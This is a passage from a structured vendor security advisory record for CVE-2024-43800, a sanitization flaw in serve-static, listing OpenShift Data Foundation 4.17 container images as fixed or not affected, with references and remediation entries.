"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", 